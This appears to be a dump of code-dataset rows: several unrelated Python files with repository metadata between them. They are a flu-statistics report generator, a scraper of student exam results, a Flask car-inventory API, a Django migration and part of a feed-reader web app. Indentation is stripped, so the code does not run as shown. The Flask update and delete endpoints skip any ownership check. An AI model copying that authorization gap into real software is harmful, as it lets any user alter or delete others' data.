previous_stat_path = previous_stat_dir and previous_stat_dir.joinpath('stat.json.xz')
if previous_stat_path and previous_stat_path.exists():
module_logger.info('Loading previous stat from {}'.format(previous_stat_path))
previous_stat = json.load(lzma.LZMAFile(previous_stat_path, "rb"))
else:
previous_stat = None
return previous_stat
# ----------------------------------------------------------------------
def _make_tabs(output_dir, stat, previous_stat):
for virus_type in stat['antigens']:
if virus_type != "BUNKNOWN":
for lab in stat['antigens'][virus_type]:
for period in ('month', 'year'):
_make_tab(output_dir=output_dir, output_suffix='.txt', stat=stat, previous_stat=previous_stat, virus_type=virus_type, lab=lab, period=period, make_header=_make_header_tab, make_line=_make_line_tab, make_separator=_make_separator_tab, make_footer=_make_footer_tab)
# ======================================================================
def _make_tab(output_dir, output_suffix, stat, previous_stat, virus_type, lab, period, make_header, make_line, make_separator, make_footer):
data_antigens = stat['antigens'][virus_type][lab]
data_sera_unique = stat['sera_unique'].get(virus_type, {}).get(lab, {})
data_sera = stat['sera'].get(virus_type, {}).get(lab, {})
if previous_stat:
previous_vt = _fix_virus_type_for_previous(virus_type, previous_stat)
previous_data_antigens = previous_stat['antigens'][previous_vt][lab]
previous_data_sera_unique = previous_stat['sera_unique'].get(previous_vt, {}).get(lab, {})
previous_data_sera = previous_stat['sera'].get(previous_vt, {}).get(lab, {})
else:
previous_data_antigens, previous_data_sera_unique, previous_data_sera = {}, {}, {}
filename = Path(output_dir, '{lab}-{virus_type}{period}-tab{output_suffix}'.format(virus_type=sVirusTypeForFilename[virus_type.lower()], lab=lab.lower(), period=sPeriodForFilename[period], output_suffix=output_suffix))
module_logger.info('Writing {}'.format(filename))
with filename.open('w') as output:
output.write(make_header(period))
previous_sum = collections.defaultdict(int)
has_previous = bool(previous_stat)
for date in make_dates(data_antigens, period):
output.write(make_line(date, data_antigens=data_antigens[date], data_sera=data_sera.get(date, {}), data_sera_unique=data_sera_unique.get(date, {}), period=period, has_previous=has_previous, previous_data_antigens=previous_data_antigens.get(date, {}), previous_data_sera=previous_data_sera.get(date, {}).get('all', 0), previous_data_sera_unique=previous_data_sera_unique.get(date, {}).get('all', 0)))
if has_previous:
for continent in sContinentsForTables[:-2]:
previous_sum[continent] += previous_data_antigens.get(date, {}).get(continent, 0)
previous_sum['sera'] += previous_data_sera.get(date, {}).get('all', 0)
previous_sum['sera_unique'] += previous_data_sera_unique.get(date, {}).get('all', 0)
output.write(make_separator(solid=False, eol='\n'))
output.write(make_line('all', data_antigens=data_antigens['all'], data_sera=data_sera.get('all', {}), data_sera_unique=data_sera_unique.get('all', {}), period=period, has_previous=has_previous, previous_data_antigens=previous_sum, previous_data_sera=previous_sum['sera'], previous_data_sera_unique=previous_sum['sera_unique']))
output.write(make_separator(solid=True, eol='\n'))
output.write(make_footer())
# ----------------------------------------------------------------------
def _make_header_tab(period):
return '\n'.join((_make_separator_tab(solid=True, eol=''), _make_continent_names(period), _make_separator_tab(solid=False, eol=''), ''))
# ----------------------------------------------------------------------
def _make_line_tab(date, data_antigens, data_sera, data_sera_unique, period, has_previous, previous_data_antigens, previous_data_sera, previous_data_sera_unique):
def diff_current_previous(continent):
diff = data_antigens.get(continent, 0) - previous_data_antigens.get(continent, 0)
if diff < 0:
module_logger.error('{} {}: Current: {} Previous: {}'.format(_format_date(date, period), continent, data_antigens.get(continent, 0), previous_data_antigens.get(continent, 0)))
diff = 0
return diff
global sContinentsForTables
if has_previous:
if date == 'all':
return ' '.join([_format_date(date, period)] + ['{:4d} ({:3d})'.format(data_antigens.get(continent, 0), diff_current_previous(continent)) for continent in sContinentsForTables[:-3]] + ['{:4d}({:4d})'.format(data_antigens.get('all', 0), data_antigens.get('all', 0) - previous_data_antigens.get('all', 0)), '{:4d} ({:3d})'.format(data_sera.get('all', 0), data_sera.get('all', 0) - previous_data_sera), '{:4d} ({:3d})'.format(data_sera_unique.get('all', 0), data_sera_unique.get('all', 0) - previous_data_sera_unique)]) + '\n'
else:
return ' '.join([_format_date(date, period)] + ['{:4d} ({:3d})'.format(data_antigens.get(continent, 0), diff_current_previous(continent)) for continent in sContinentsForTables[:-2]] + ['{:4d} ({:3d})'.format(data_sera.get('all', 0), data_sera.get('all', 0) - previous_data_sera), '{:4d} ({:3d})'.format(data_sera_unique.get('all', 0), data_sera_unique.get('all', 0) - previous_data_sera_unique)]) + '\n'
else:
return ' '.join([_format_date(date, period)] + ['{:10d}'.format(data_antigens.get(continent, 0)) for continent in sContinentsForTables[:-2]] + ['{:10d}'.format(data_sera.get('all', 0)), '{:10d}'.format(data_sera_unique.get('all', 0))]) + '\n'
# ----------------------------------------------------------------------
def _make_continent_names(period):
return '{:<10s} {}'.format(period, ' '.join('{:>10s}'.format(n) for n in (sHeader[nn] for nn in sContinentsForTables)))
# ----------------------------------------------------------------------
def _make_separator_tab(solid, eol):
if solid:
s = '{}{}'.format('-' * 143, eol)
else:
s = ' '.join((' '.join('----------' for i in range(10)), '-----------', ' ----------', '---------')) + eol
return s
# ----------------------------------------------------------------------
def _make_footer_tab():
return ''
# ======================================================================
def _make_csv(output_dir, stat):
stat = stat['antigens']
months = [m for m in sorted(stat['all']['all']) if re.match(r'^[12]\d\d\d[01]\d$', m)]
start, end = months[0], months[-1]
years = ['{:04d}'.format(y) for y in range(int(months[0][:4]), int(months[-1][:4]) + 1)]
virus_types = [v for v in sorted(stat) if v != 'B']
virus_types_s = [v.replace('BVICTORIA', 'BVic').replace('BYAMAGATA', 'BYam').replace('all', 'Total') for v in virus_types]
labs = sorted(stat['all'])
labs_s = [l.replace('all', 'Total') for l in labs]
filename = Path(output_dir, 'stat.csv') #'{}-{}.csv'.format(start, end))
module_logger.info('Writing {}'.format(filename))
with filename.open('w') as fd:
f = csv.writer(fd)
_make_csv_tab(f=f, stat=stat, title='TOTAL {}-{}'.format(start, end), year='all', labs=labs, labs_s=labs_s, virus_types=virus_types, virus_types_s=virus_types_s, empty_row=False)
for year in years:
_make_csv_tab(f=f, stat=stat, title=year, year=year, labs=labs, labs_s=labs_s, virus_types=virus_types, virus_types_s=virus_types_s, empty_row=True)
# ----------------------------------------------------------------------
def _make_csv_tab(f, stat, title, year, labs, labs_s, virus_types, virus_types_s, empty_row):
if empty_row:
f.writerow([''])
f.writerow([title])
f.writerow([''] + virus_types_s)
for lab_no, lab in enumerate(labs):
values = [stat[virus_type][lab].get(year, {}).get('all', "") for virus_type in virus_types]
f.writerow([labs_s[lab_no]] + [str(v) for v in values])
# ======================================================================
def _make_webpage(output_dir, stat):
filename = Path(output_dir, 'index.html')
module_logger.info('Writing {}'.format(filename))
content = {
'last_update': str(datetime.datetime.now()),
}
with filename.open('w') as output:
output.write('<html>\n<head>\n<meta charset="utf-8"><title>Statistics for antigens and sera found in WHO CC HI tables</title>\n')
output.write('<style type="text/css">\n<!--\n.flu-type { color: #008000; }\np.end-of-table { margin-bottom: 2em; }\n.table-in-plain-text { text-align: right; }\ntable.month td, table.year td {border: 1px solid #A0A0A0; }\ntd.number { text-align: right; padding: 0 1.5em 0 0; width: 3em; }\ntr.odd { background-color: #E0E0FF; } tr.even { background-color: white; }\nthead, tr.total { font-weight: bold; background-color: #F0E0E0; }\nthead { text-align: center; }\n\n-->\n</style></head>\n')
output.write('<body><h1>Statistics for antigens and sera found in WHO CC HI tables</h1>\n<p style="font-size: 0.7em; text-align: right">Last update: {last_update}</p>\n'.format(**content))
output.write('<ul style="margin: 1em;">\n')
for virus_type in sVirusTypeOrder:
output.write('<li><span class="flu-type" style="font-weight: bold;">{virus_type}</span> {links}</li>\n'.format(
virus_type=virus_type.replace('all', 'All flu types,'), links=' '.join('<a href="#{virus_type}-{lab}">{lab}</a>'.format(virus_type=virus_type, lab=lab_display_name(lab)) for lab in ['all'] + sLabOrder)))
output.write('</ul>\n')
output.write('<a href="stat.csv">Yearly statistics in the CSV format</a>\n')
for virus_type in sVirusTypeOrder:
output.write('<hr />\n<h2 id="{virus_type}" style="margin-bottom: 1em;"><span class="flu-type">{virus_type}</span></h2>\n'.format(virus_type=virus_type.replace('all', 'All flu types')))
for lab in ['all'] + sLabOrder:
# output.write('<hr />\n<h3 id="{virus_type}-{lab}" style="margin-bottom: 5px;"><span class="flu-type">{virus_type}</span> {lab}</h3>\n'.format(virus_type=virus_type.replace('all', 'All flu types,'), lab=lab_display_name(lab)))
output.write('<h3 id="{virus_type}-{lab}" style="margin-bottom: 1em;">{lab} {virus_type}</h3>\n'.format(virus_type=virus_type.replace('all', '(All flu types)'), lab=lab_display_name(lab)))
_make_webtable(output=output, stat=stat, virus_type=virus_type, lab=lab, period='month')
_make_webtable(output=output, stat=stat, virus_type=virus_type, lab=lab, period='year')
output.write('<div style="margin-bottom: 2em;"></div>\n')
output.write('</body>\n</html>\n')
# ----------------------------------------------------------------------
def _make_webtable(output, stat, virus_type, lab, period):
global sContinentsForTables
data_antigens = stat['antigens'].get(virus_type, {}).get(lab, {})
if data_antigens:
data_sera_unique = stat['sera_unique'].get(virus_type, {}).get(lab, {})
data_sera = stat['sera'].get(virus_type, {}).get(lab, {})
def make_total():
output.write('<tr class="total"><td class="date">TOTAL</td><td class="number">{continents}</td><td class="number">{serum}</td><td class="number">{serum_unique}</td></tr>\n'.format(continents='</td><td class="number">'.join(str(data_antigens['all'].get(continent, '')) for continent in sContinentsForTables[:-2]), serum=str(data_sera.get('all', {}).get('all', '')), serum_unique=str(data_sera_unique.get('all', {}).get('all', ''))))
output.write('<table class="{period}" style="border: 1px solid #A0A0A0; border-collapse: collapse;">\n'.format(period=period))
output.write('<caption class="table-in-plain-text"><a href="{lab}-{virus_type}{period}-tab.txt">Table in plain text</a></caption>\n'.format(virus_type=sVirusTypeForFilename[virus_type.lower()], lab=lab.lower(), period=sPeriodForFilename[period]))
output.write('<caption class="table-in-plain-text" style="caption-side:bottom;"><a href="{lab}-{virus_type}{period}-tab.txt">Table in plain text</a></caption>\n'.format(virus_type=sVirusTypeForFilename[virus_type.lower()], lab=lab.lower(), period=sPeriodForFilename[period]))
output.write('<thead><td>{period}</td><td>{continents}</td></thead>\n'.format(period=period, continents='</td><td>'.join(sHeader[nn] for nn in sContinentsForTables)))
output.write('<tbody>\n')
make_total()
for no, date in enumerate(make_dates(data_antigens, period, reverse=True)):
output.write('<tr class="{odd_even}"><td class="date">{date}</td><td class="number">{continents}</td><td class="number">{serum}</td><td class="number">{serum_unique}</td></tr>\n'.format(odd_even="odd" if (no % 2) else "even", date=_format_date(date, period), continents='</td><td class="number">'.join(str(data_antigens[date].get(continent, '')) for continent in sContinentsForTables[:-2]), serum=str(data_sera.get(date, {}).get('all', '')), serum_unique=str(data_sera_unique.get(date, {}).get('all', ''))))
output.write('\n')
make_total()
output.write('</tbody>\n')
output.write('</table>\n')
output.write('<p class="end-of-table" />\n')
# ======================================================================
sReYearMonth = {'month': re.compile(r'^\d{6}$', re.I), 'year': re.compile(r'^\d{4}$', re.I)}
def make_dates(data, period, **sorting):
global sReYearMonth
rex = sReYearMonth[period]
return sorted((date for date in data if rex.match(date)), **sorting)
# ----------------------------------------------------------------------
def _format_date(date, period):
if date[0] == '9':
result = 'Unknown '
elif date == 'all':
result = 'TOTAL '
elif len(date) == 4 or date[4:] == '99':
if period == 'month':
result = '{}-?? '.format(date[:4])
else:
result = '{} '.format(date[:4])
else:
result = '{}-{} '.format(date[:4], date[4:])
return result
# ----------------------------------------------------------------------
def _fix_virus_type_for_previous(virus_type, previous_stat):
if virus_type not in previous_stat['antigens']:
if virus_type == "A(H3N2)":
virus_type = "H3"
elif virus_type == "A(H1N1)":
virus_type = "H1PDM"
return virus_type
# ======================================================================
|
[
"github@skepner.eu"
] |
github@skepner.eu
|
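A hedged driver for make_stat above; the import path is inferred from the row's /py/vr/stat.py location and the relative `.lab` import, and all paths and dates are placeholders. output_dir and previous_stat_dir must be pathlib.Path objects, since the code calls .mkdir() and .joinpath() on them.

from pathlib import Path
from vr.stat import make_stat  # package name assumed from /py/vr/stat.py

make_stat(
    output_dir=Path("out/stat"),
    hidb_dir=Path("db/hidb5"),
    start="2021-01-01",
    end="2022-01-01",
    previous_stat_dir=Path("out/stat-previous"),  # or None to skip the diff columns
)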
40c6be57a2548ec77ba7486a14eab9e30a750b5f
|
9849703ed6e995582e0eb354e18b3a528c68bf51
|
/datascraper.py
|
e44c83dd26904af45e7aa26123bffa05bc5b1245
|
[
"LicenseRef-scancode-other-permissive",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
vozille/Rank-list-generator
|
31535db77ccfbcee501e2d12bd40eb3658c2f6d7
|
e0ebfe003e436ebfc409cb470f0e47ae64224db8
|
refs/heads/master
| 2016-09-06T21:30:39.895080
| 2015-08-19T15:17:03
| 2015-08-19T15:17:03
| 30,417,019
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,929
|
py
|
#Anwesh Mohanty
import Tkinter
import sys
from lxml import html
import requests
from Tkinter import *
import math
import tkMessageBox
import os
import time
# import rank_generator
# import rankGenUI
number = 0
ind = ["MECHANICAL ENGINEERING ","ELECTRICAL ENGINEERING ","CIVIL ENGINEERING ","INSTRUMENTATION & ELECTRONICS ENGINEERING "\
,"COMPUTER SCIENCE & ENGINEERING ","BIO TECHNOLOGY ","INFORMATION TECHNOLOGY ","TEXTILE ENGINEERING ","FASHION TECHNOLOGY ","BACHELOR OF ARCHITECTURE "]
visited = [False]*len(ind)
subjects = [[]for i in range(len(ind))]
def formatting(a,b,c,d,e):
ans = ' Generated ' + b + ' ' + u"\u2713"
return ans
def show(n,a,path): # iterator, address
flag = True
# start = time.time()
# webAddress = "http://results.bput.ac.in/525_RES/1301106106.html"
# page=requests.get(webAddress)
# tree=html.fromstring(page.text)
# namechk = ''
# while True:
# namechk = tree.xpath("/html/body/table/tr[3]/td/table/tr[2]/td[2]/b/text()")
# end = time.time()
# if end - start > 3:
# break
# if len(namechk) > 0:
# flag = True
# else:
# flag = False
# del start
# del end
if flag:
try:
f = os.open(path,os.O_WRONLY|os.O_APPEND|os.O_CREAT)
sys.stdout = open(path,'a')
i = n
add = a
webAddress = "http://results.bput.ac.in/"+str(add)+"_RES/"
page=requests.get(webAddress+"%s.html"%str(i))
tree=html.fromstring(page.text)
name=tree.xpath("/html/body/table/tr[3]/td/table/tr[2]/td[2]/b/text()")
branch=tree.xpath("/html/body/table/tr[3]/td/table/tr[4]/td[2]/b/text()")
roll=tree.xpath("/html/body/table/tr[3]/td/table/tr[1]/td[2]/text()")
sgpa = []
count = []
if len(name) != 0:
count = tree.xpath("/html/body/table/tr[5]/td/table/tr[position() > 1]/td[1]/text()")
del count[-1]
count = map(int,count)
if len(count) != 0:
sgpa=tree.xpath("/html/body/table/tr[5]/td/table/tr[%s]/td[3]/text()"%str(len(count)+2))
if name and sgpa:
if branch[0] == "ELECTRONICS AND INSTRUMENTATION ENGINEERING. ":
branch[0] = "INSTRUMENTATION & ELECTRONICS ENGINEERING "
if name and sgpa:
grades = tree.xpath("/html/body/table/tr[5]/td/table/tr[position() > 1 and position() < %s]/td[5]/text()"%str(count[-1]+2))
sub = tree.xpath("/html/body/table/tr[5]/td/table/tr[position() > 1 and position() < %s]/td[3]/text()"%str(count[-1]+2))
grades = ''.join(grades)
if name and sgpa:
res = ind.index(branch[0]+' ')
if not visited[res]:
visited[res] = True
for i in sub:
subjects[res].append(i)
if name and sgpa:
print name[0],roll[0],branch[0],sgpa[0],grades
sys.stdout.close()
os.close(f)
ans = formatting(name[0],roll[0],branch[0],sgpa[0],grades)
return ans
else:
return '0'
except requests.ConnectionError:
app2 = Tkinter.Tk()
app2.withdraw()
tkMessageBox.showinfo("Error",'No Internet Connection')
return '-1'
else:
app2 = Tkinter.Tk()
app2.withdraw()
tkMessageBox.showinfo("Error",'Website is down :(')
return '-1'
def getSubject(path):
f = os.open(path,os.O_WRONLY|os.O_APPEND|os.O_CREAT)
sys.stdout = open(path,'w')
for i in subjects:
for j in i:
j = j.replace(' ','-')
print j,
print
sys.stdout.close()
os.close(f)
|
[
"anwesh063@gmail.com"
] |
anwesh063@gmail.com
|
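A hedged driver for the scraper above (Python 2, matching the script); the roll number, results code, and output paths are placeholders.

status = show(1301106106, 525, "results.txt")  # scrape one result page, append a row
if status not in ('0', '-1'):                  # '0' = no data, '-1' = error dialog shown
    getSubject("subjects.txt")                 # then dump the per-branch subject lists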
ad088c4e655ae3617b31666867924e0adc3d41ab
|
c6106a6a087fb5388cd24fb550247ead3fc99f28
|
/car_inventory/api/routes.py
|
8fee2d367d551b9d3c0d6eed17c1350a12fdd419
|
[] |
no_license
|
jcnghm/Car-API-Flask
|
e52bdd940a2047f627493470739db97f080fbd21
|
2b16c289fd8b5f542d815f5c5b1f8f4547ab1009
|
refs/heads/master
| 2023-08-18T00:24:13.151394
| 2021-09-15T17:55:50
| 2021-09-15T17:55:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,494
|
py
|
from flask import Blueprint, request, jsonify
from car_inventory.helpers import token_required
from car_inventory.models import db, User, Car, car_schema, cars_schema
api = Blueprint('api', __name__, url_prefix = '/api')
@api.route('/getdata')
@token_required
def get_data(current_user_token):
return { 'The' : 'Vehicle'}
# CREATE CAR ENDPOINT
@api.route('/cars', methods = ['POST'])
@token_required
def create_car(current_user_token):
make = request.json['make']
model= request.json['model']
price = request.json['price']
trim = request.json['trim']
added_options = request.json['added_options']
dimensions = request.json['dimensions']
weight = request.json['weight']
user_token = current_user_token.token
car = Car(make, model, price, trim, added_options, dimensions, weight, user_token)
db.session.add(car)
db.session.commit()
response = car_schema.dump(car)
return jsonify(response)
# RETRIEVE ALL CARS ENDPOINT
@api.route('/cars', methods = ['GET'])
@token_required
def get_cars(current_user_token):
owner = current_user_token.token
cars = Car.query.filter_by(user_token = owner).all()
response = cars_schema.dump(cars)
return jsonify(response)
# RETRIEVE ONE CAR ENDPOINT
@api.route('/cars/<id>', methods = ['GET'])
@token_required
def get_car(current_user_token, id):
owner = current_user_token.token
car = Car.query.get(id)
if car and car.user_token == owner:
response = car_schema.dump(car)
return jsonify(response)
else:
return jsonify({'message' : 'Valid Token Required'}), 401
# UPDATE CAR ENDPOINT
@api.route('/cars/<id>', methods = ['POST', 'PUT'])
@token_required
def update_car(current_user_token, id):
car = Car.query.get(id) # Get Car Instance
car.make = request.json['make']
car.model = request.json['model']
car.price = request.json['price']
car.trim = request.json['trim']
car.added_options = request.json['added_options']
car.dimensions = request.json['dimensions']
car.weight = request.json['weight']
car.user_token = current_user_token.token
db.session.commit()
response = car_schema.dump(car)
return jsonify(response)
# DELETE CAR ENDPOINT
@api.route('/cars/<id>', methods = ['DELETE'])
@token_required
def delete_car(current_user_token, id):
car = Car.query.get(id)
db.session.delete(car)
db.session.commit()
response = car_schema.dump(car)
return jsonify(response)
|
[
"jcnghmpsEgmail.com"
] |
jcnghmpsEgmail.com
|
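A hedged client sketch for the car endpoints above; the host, port, and token header format are assumptions (whatever token_required in car_inventory.helpers actually expects), and the field values are placeholders.

import requests

headers = {"Authorization": "Bearer <user-token>"}  # header name/format assumed
payload = {
    "make": "Toyota", "model": "Corolla", "price": 21000, "trim": "LE",
    "added_options": "none", "dimensions": "4630x1780x1435", "weight": 1355,
}
r = requests.post("http://localhost:5000/api/cars", json=payload, headers=headers)
print(r.json())                                     # the car_schema dump of the new row
cars = requests.get("http://localhost:5000/api/cars", headers=headers).json()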
8332846623f1a5df6ebc02ade8a3006b33f793f4
|
6e44863b66ca27393e4df02579a17858093e964e
|
/collage_app/migrations/0007_auto_20210729_1409.py
|
33373b94c9465f0c1328baac70b798da8f5686fc
|
[] |
no_license
|
futureseadev/NFTBackend
|
297d164fb54be85c57f5ed9a9156984f4b61110e
|
aa4b027496d65801fbd203fc57d6a19fc97f507d
|
refs/heads/main
| 2023-08-24T00:01:37.484314
| 2021-11-01T00:40:46
| 2021-11-01T00:40:46
| 423,609,550
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
# Generated by Django 3.2.5 on 2021-07-29 14:09
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('collage_app', '0006_alter_serie_slug'),
]
operations = [
migrations.RenameModel(
old_name='TokenImage',
new_name='Token',
),
migrations.RemoveField(
model_name='serie',
name='license_name',
),
migrations.RemoveField(
model_name='serie',
name='total_minted',
),
]
|
[
"artsiomliaver@gmail.com"
] |
artsiomliaver@gmail.com
|
af3584ba00a8c05c57704d30781c6e67ca2600c2
|
a7215a919ce9ecd1cb09fd4a66543d99e3c1619e
|
/venv/Lib/site-packages/reader/_app/__init__.py
|
4275752bc3bd69133e4817d0c17039d0bd1cdc84
|
[] |
no_license
|
srikanthajithy/Srikanth_Assignment_3
|
2f8b14cf4b51a9ae871fede91f69d273ac8ec5a7
|
040691ae59b204aa675ad9b879bef34302c0a61d
|
refs/heads/master
| 2023-06-17T23:35:40.563258
| 2021-06-29T22:55:46
| 2021-06-29T22:55:46
| 381,516,636
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,406
|
py
|
import contextlib
import itertools
import json
import time
from dataclasses import dataclass
import flask.signals
import humanize
import markupsafe
import yaml
from flask import abort
from flask import Blueprint
from flask import current_app
from flask import flash
from flask import Flask
from flask import g
from flask import get_flashed_messages
from flask import redirect
from flask import render_template
from flask import request
from flask import Response
from flask import stream_with_context
from flask import url_for
import reader
from .api_thing import APIError
from .api_thing import APIThing
from reader import Content
from reader import Entry
from reader import EntrySearchResult
from reader import InvalidSearchQueryError
from reader import ParseError
from reader import ReaderError
from reader._plugins import Loader
blueprint = Blueprint('reader', __name__)
blueprint.app_template_filter('humanize_naturaltime')(humanize.naturaltime)
# if any plugins need signals, they need to install blinker
signals = flask.signals.Namespace()
# NOTE: these signals are part of the app extension API
got_preview_parse_error = signals.signal('preview-parse-error')
def get_reader():
if not hasattr(g, 'reader'):
g.reader = current_app.config['READER_CONFIG'].make_reader(
'app', plugin_loader=current_app.plugin_loader
)
return g.reader
def close_db(error):
if hasattr(g, 'reader'):
g.reader.close()
def stream_template(template_name_or_list, **kwargs):
template = current_app.jinja_env.get_template(template_name_or_list)
stream = template.stream(**kwargs)
stream.enable_buffering(50)
return Response(stream_with_context(stream))
@blueprint.before_app_request
def add_request_time():
start = time.monotonic()
g.request_time = lambda: time.monotonic() - start
@blueprint.before_app_request
def add_reader_version():
g.reader_version = reader.__version__
def highlighted(string):
# needs to be marked as safe so we don't need to do it everywhere in the template
# TODO: maybe use something "more semantic" than <b> (CSS needs changing too if so)
return markupsafe.Markup(
string.apply('<b>', '</b>', lambda s: str(markupsafe.escape(s)))
)
@dataclass(frozen=True)
class EntryProxy:
_search_result: EntrySearchResult
_entry: Entry
def __getattr__(self, name):
return getattr(self._entry, name)
@property
def title(self):
highlight = self._search_result.metadata.get('.title')
if highlight:
return str(highlight)
return None
@property
def feed(self):
return FeedProxy(self._search_result, self._entry)
@property
def summary(self):
highlight = self._search_result.content.get('.summary')
if highlight:
return highlighted(highlight)
return None
@property
def content(self):
rv = []
for path, highlight in self._search_result.content.items():
# TODO: find a more correct way to match .content[0].value
if path.startswith('.content[') and path.endswith('].value'):
rv.append(Content(str(highlight), 'text/plain'))
rv.append(Content(highlighted(highlight), 'text/html'))
return rv
@dataclass(frozen=True)
class FeedProxy:
_search_result: EntrySearchResult
_entry: Entry
def __getattr__(self, name):
return getattr(self._entry.feed, name)
@property
def title(self):
highlight = self._search_result.metadata.get('.feed.title')
if highlight:
return str(highlight)
return self._entry.feed.title
@blueprint.route('/')
def entries():
show = request.args.get('show', 'unread')
read = {'all': None, 'unread': False, 'read': True}[show]
has_enclosures = request.args.get('has-enclosures')
has_enclosures = {None: None, 'no': False, 'yes': True}[has_enclosures]
important = request.args.get('important')
important = {None: None, 'no': False, 'yes': True}[important]
if not request.args.get('q'):
sort = request.args.get('sort', 'recent')
assert sort in ('recent', 'random')
else:
sort = request.args.get('sort', 'relevant')
assert sort in ('relevant', 'recent', 'random')
reader = get_reader()
feed_url = request.args.get('feed')
feed = None
feed_tags = None
if feed_url:
feed = reader.get_feed(feed_url, None)
if not feed:
abort(404)
feed_tags = list(reader.get_feed_tags(feed))
args = request.args.copy()
query = args.pop('q', None)
if query is None:
def get_entries(**kwargs):
yield from reader.get_entries(sort=sort, **kwargs)
get_entry_counts = reader.get_entry_counts
elif not query:
# if the query is '', it's not a search
args.pop('sort', None)
return redirect(url_for('.entries', **args))
else:
def get_entries(**kwargs):
for sr in reader.search_entries(query, sort=sort, **kwargs):
yield EntryProxy(sr, reader.get_entry(sr))
def get_entry_counts(**kwargs):
return reader.search_entry_counts(query, **kwargs)
# TODO: render the actual search result, not the entry
# TODO: catch and flash syntax errors
# TODO: don't show search box if search is not enabled
error = None
# TODO: duplicated from feeds()
tags_str = tags = args.pop('tags', None)
if tags is None:
pass
elif not tags.strip():
# if tags is '', it's not a tag filter
return redirect(url_for('.entries', **args))
else:
try:
tags = yaml.safe_load(tags)
except yaml.YAMLError as e:
error = f"invalid tag query: invalid YAML: {e}: {tags_str}"
return stream_template(
'entries.html', feed=feed, feed_tags=feed_tags, error=error
)
kwargs = dict(
feed=feed_url,
read=read,
has_enclosures=has_enclosures,
important=important,
feed_tags=tags,
)
entries = get_entries(**kwargs, limit=request.args.get('limit', type=int))
with_counts = request.args.get('counts')
with_counts = {None: None, 'no': False, 'yes': True}[with_counts]
counts = get_entry_counts(**kwargs) if with_counts else None
try:
first = next(entries)
entries = itertools.chain([first], entries)
except StopIteration:
pass
except InvalidSearchQueryError as e:
error = f"invalid search query: {e}"
except ValueError as e:
# TODO: there should be a better way of matching this kind of error
if 'tag' in str(e).lower():
error = f"invalid tag query: {e}: {tags_str}"
else:
raise
entries = list(entries)
entries_data = None
if feed_url:
entries_data = [e.id for e in entries]
# Ensure flashed messages get removed from the session,
# otherwise they keep adding up and never disappear.
# Assumes the template will call get_flashed_messages() at some point.
# https://github.com/lemon24/reader/issues/81
get_flashed_messages()
return stream_template(
'entries.html',
entries=entries,
feed=feed,
feed_tags=feed_tags,
entries_data=entries_data,
error=error,
counts=counts,
)
@blueprint.route('/preview')
def preview():
# TODO: maybe unify with entries() somehow
url = request.args['url']
# TODO: maybe redirect to the feed we have if we already have it
# TODO: maybe cache stuff
reader = current_app.config['READER_CONFIG'].make_reader(
'default', url=':memory:', plugin_loader=current_app.plugin_loader
)
reader.add_feed(url)
try:
reader.update_feed(url)
except ParseError as e:
# give plugins a chance to intercept this
got_preview_parse_error.send(e)
# https://github.com/lemon24/reader/issues/172
# no plugin intercepted the response, so we show the feed;
# feed.last_exception will be checked in the template,
# and if there was a ParseError, it will be shown
feed = reader.get_feed(url)
entries = list(reader.get_entries())
# TODO: maybe limit
return stream_template('entries.html', entries=entries, feed=feed, read_only=True)
@blueprint.route('/feeds')
def feeds():
broken = request.args.get('broken')
broken = {None: None, 'no': False, 'yes': True}[broken]
updates_enabled = request.args.get('updates-enabled')
updates_enabled = {None: None, 'no': False, 'yes': True}[updates_enabled]
sort = request.args.get('sort', 'title')
assert sort in ('title', 'added')
error = None
args = request.args.copy()
tags_str = tags = args.pop('tags', None)
if tags is None:
pass
elif not tags.strip():
# if tags is '', it's not a tag filter
return redirect(url_for('.feeds', **args))
else:
try:
tags = yaml.safe_load(tags)
except yaml.YAMLError as e:
error = f"invalid tag query: invalid YAML: {e}: {tags_str}"
return stream_template('feeds.html', feed_data=[], error=error)
reader = get_reader()
kwargs = dict(broken=broken, tags=tags, updates_enabled=updates_enabled)
with_counts = request.args.get('counts')
with_counts = {None: None, 'no': False, 'yes': True}[with_counts]
counts = reader.get_feed_counts(**kwargs) if with_counts else None
feed_data = []
try:
feeds = reader.get_feeds(sort=sort, **kwargs)
feed_data = (
(
feed,
list(reader.get_feed_tags(feed)),
reader.get_entry_counts(feed=feed) if with_counts else None,
)
for feed in feeds
)
except ValueError as e:
# TODO: there should be a better way of matching this kind of error
if 'tag' in str(e).lower():
error = f"invalid tag query: {e}: {tags_str}"
else:
raise
# Ensure flashed messages get removed from the session.
# https://github.com/lemon24/reader/issues/81
get_flashed_messages()
return stream_template(
'feeds.html', feed_data=feed_data, error=error, counts=counts
)
@blueprint.route('/metadata')
def metadata():
reader = get_reader()
feed_url = request.args['feed']
feed = reader.get_feed(feed_url, None)
if not feed:
abort(404)
metadata = reader.get_feed_metadata(feed_url)
# Ensure flashed messages get removed from the session.
# https://github.com/lemon24/reader/issues/81
get_flashed_messages()
return stream_template(
'metadata.html',
feed=feed,
metadata=metadata,
to_pretty_json=lambda t: yaml.safe_dump(t),
)
@blueprint.route('/entry')
def entry():
reader = get_reader()
feed_url = request.args['feed']
entry_id = request.args['entry']
entry = reader.get_entry((feed_url, entry_id), default=None)
if not entry:
abort(404)
return render_template('entry.html', entry=entry)
@blueprint.route('/tags')
def tags():
reader = get_reader()
with_counts = request.args.get('counts')
with_counts = {None: None, 'no': False, 'yes': True}[with_counts]
def iter_tags():
for tag in itertools.chain([None, True, False], reader.get_feed_tags()):
feed_counts = None
entry_counts = None
if with_counts:
tags_arg = [tag] if tag is not None else tag
feed_counts = reader.get_feed_counts(tags=tags_arg)
entry_counts = reader.get_entry_counts(feed_tags=tags_arg)
yield tag, feed_counts, entry_counts
return render_template('tags.html', tags=iter_tags())
form_api = APIThing(blueprint, '/form-api', 'form_api')
@contextlib.contextmanager
def readererror_to_apierror(*args):
try:
yield
except ReaderError as e:
category = None
if hasattr(e, 'url'):
category = (e.url,)
if hasattr(e, 'id'):
category += (e.id,)
raise APIError(str(e), category)
@form_api
@readererror_to_apierror()
def mark_as_read(data):
feed_url = data['feed-url']
entry_id = data['entry-id']
get_reader().mark_entry_as_read((feed_url, entry_id))
@form_api
@readererror_to_apierror()
def mark_as_unread(data):
feed_url = data['feed-url']
